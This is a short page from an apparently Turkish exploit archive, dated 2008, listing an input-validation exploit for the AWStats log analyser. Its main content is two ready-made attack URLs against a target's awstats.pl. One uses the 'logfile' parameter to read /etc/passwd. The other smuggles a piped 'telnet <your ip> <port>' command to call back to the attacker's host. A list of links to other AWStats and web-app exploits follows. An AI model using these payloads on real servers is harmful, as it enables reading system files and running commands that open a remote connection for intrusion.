Exploit / Web Apps Exploit / AWStats Input Validation Hole in 'logfile'

Eklenme Tarihi: 2008-10-20 22:59
Example:

[url]http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log[/url] file=/etc/passwd

[url]http://[target]/awstats.pl?filterrawlog=&amp;rawlog_maxlines=5000&amp;config=stats.jdims.info&amp;framename=main&amp;pluginmode=rawlog&amp;logfile=&amp;logfile=|telnet[/url] <your ip> <port>


Yorumlar:

  1. Henüz Yorum Eklenmedi

Yorum Ekle



Keywords:




Benzer Sayfalar (Similar Pages):

Bulunamadı. (not found)

Bu Sayfalarda İlginizi Çekebilir (The Links Bellow May Attract You As Well):
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / miniBB Input Validation Hole in 'user' Parameter
Exploit / Web Apps Exploit / AwStats <= 6.4 Denial Of Service (with Advisory)
Exploit / Web Apps Exploit / AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit
Exploit / Web Apps Exploit / AWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit
Exploit / Web Apps Exploit / MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit
Exploit / Web Apps Exploit / AWStats < 6.4 (referer) Remote Command Execution Exploit
Exploit / Web Apps Exploit / Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability